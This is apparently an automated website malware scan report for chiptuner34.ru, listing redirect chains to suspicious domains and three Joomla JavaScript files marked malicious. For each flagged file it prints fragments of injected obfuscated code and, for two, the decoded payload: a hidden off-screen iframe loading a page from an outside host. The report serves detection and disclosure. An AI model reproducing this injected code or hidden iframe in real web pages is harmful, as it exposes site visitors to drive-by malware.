Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.chiptuner34.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.chiptuner34.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: post-check=0, pre-check=0 Connection: close Date: Sat, 16 Aug 2014 17:41:29 GMT Pragma: no-cache Location: http://web-redirect.ru/?web Server: nginx Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 16 Aug 2014 17:41:29 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: _cutt_caches_images=1408210889; expires=Sun, 17-Aug-2014 17:41:29 GMT; path=/ Set-Cookie: e4a5be75c345d3b74877af9ac54ab887=qhu0n26k03g9fg9503pt5fb8n6; path=/ Set-Cookie: iamalive=yes;Path=/; X-Powered-By: PHP/5.2.17 | malicious |
URL: http://web-redirect.ru/?web (imitation of visitor from search engine) GET /?web HTTP/1.1 Host: web-redirect.ru Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Sat, 16 Aug 2014 17:38:22 GMT Pragma: no-cache Location: http://starik.ru/components/com_users/1/index.php Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Thu, 21 Jul 1977 07:30:00 GMT Last-Modified: Sat, 16 Aug 2014 17:38:22 GMT X-Powered-By: PHP/5.3.3 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://www.chiptuner34.ru/ | 200 OK Content-Length: 20852 Content-Type: text/html | clean |
http://www.chiptuner34.ru/components/com_jcomments/js/jcomments-v2.1.js?v=7 | 200 OK Content-Length: 29643 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& unsubscribe: function(o,g){return this.ajax('JCommentsUnsubscribe',arguments);}, updateSubscription: function(m,t){var e=this.$('comments-subscription');if(e){var jc=this;e.innerHTML=t;e.onclick=m?function(){jc.unsubscribe(jc.oi,jc.og);return false;}:function(){jc.subscribe(jc.oi,jc.og);return false;};e.blur();}}, go: function(l){window.open(l);return false;} };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src="http://qwant.mirabilisvoyage.ro/gefewtgfdghrhtrj8.html" style="position:absolute;left:-1311px;top:-1311px;" height="132" width="132" name="OpenJaker"></iframe> Antivirus reports:
| ||
http://www.chiptuner34.ru/components/com_jcomments/libraries/joomlatune/ajax.js?v=3 | 200 OK Content-Length: 6390 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& case 'js': if(data){eval(data);} break; default: this.error('Unknown command: ' + cmd);break; } } delete result; delete cmd; delete id; delete property; delete data; delete obj; return true; }; this.error = function(){}; } var jtajax = new jtAJAX(); };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Decoded script: <iframe src="http://qwant.mirabilisvoyage.ro/gefewtgfdghrhtrj8.html" style="position:absolute;left:-1311px;top:-1311px;" height="132" width="132" name="OpenJaker"></iframe> Antivirus reports:
| ||
http://www.chiptuner34.ru/media/system/js/caption.js | 200 OK Content-Length: 4162 Content-Type: application/x-javascript | clean |
http://www.chiptuner34.ru/plugins/system/pc_includes/ajax_1.3.js | 200 OK Content-Length: 11146 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& else {if(objCheckbox[0].checked) {var value=objCheckbox[0].value;value=value.replace(/"/g,""");postData[postData.length]=new Array(assCheckbox[i],encodeURIComponent(value));}}}}}} return postData;}} function jax_iresponse(){jax.processIResponse();} var jax=new Jax();;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://vkontakte.ru/js/api/openapi.js?9 | 200 OK Content-Length: 64013 Content-Type: application/x-javascript | clean |
http://www.chiptuner34.ru//yandex.st/share/share.js/ | 404 Not Found Content-Length: 307 Content-Type: text/html | clean |
http://www.chiptuner34.ru/test404page.js | 404 Not Found Content-Length: 296 Content-Type: text/html | clean |
http://www.chiptuner34.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 312 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=chiptuner34.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://chiptuner34.ru/
Result: chiptuner34.ru is not infected or malware details are not published yet.
Result: chiptuner34.ru is not infected or malware details are not published yet.